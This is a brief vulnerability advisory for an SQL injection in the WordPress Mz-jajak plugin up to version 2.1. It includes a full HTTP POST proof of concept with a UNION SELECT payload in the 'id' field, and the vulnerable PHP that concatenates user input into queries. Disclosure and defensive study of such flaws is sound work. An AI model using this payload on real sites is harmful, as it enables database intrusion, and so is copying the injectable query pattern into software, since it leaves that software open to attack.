|
|
| |
| WordPress Mz-jajak plugin <= 2.1 suffers from SQL injection vulnerability |
| |
Credit:
The information has been provided by StRoNiX.
|
| |
Vulnerable Systems:
* WordPress Mz-jajak plugin <= 2.1
---------------
PoC (POST data)
---------------
POST /index.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/?page_id=9
Connection: Keep-Alive
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
answer=1&formvote=Y&id=1 AND 1=0 UNION ALL SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15--+&x=10&y=12
Vulnerable code
$id=$_POST['id'];
...
$query = $wpdb->query("UPDATE " . $table_name . " SET ".$answert."=".$answert."+1 WHERE id=".$id);
}
$rows = $wpdb->get_results("SELECT * FROM " . $table_name . " WHERE id=".$id);
Disclosure Timeline:
Published: 2012-08-10
|
|
blog comments powered by
|
|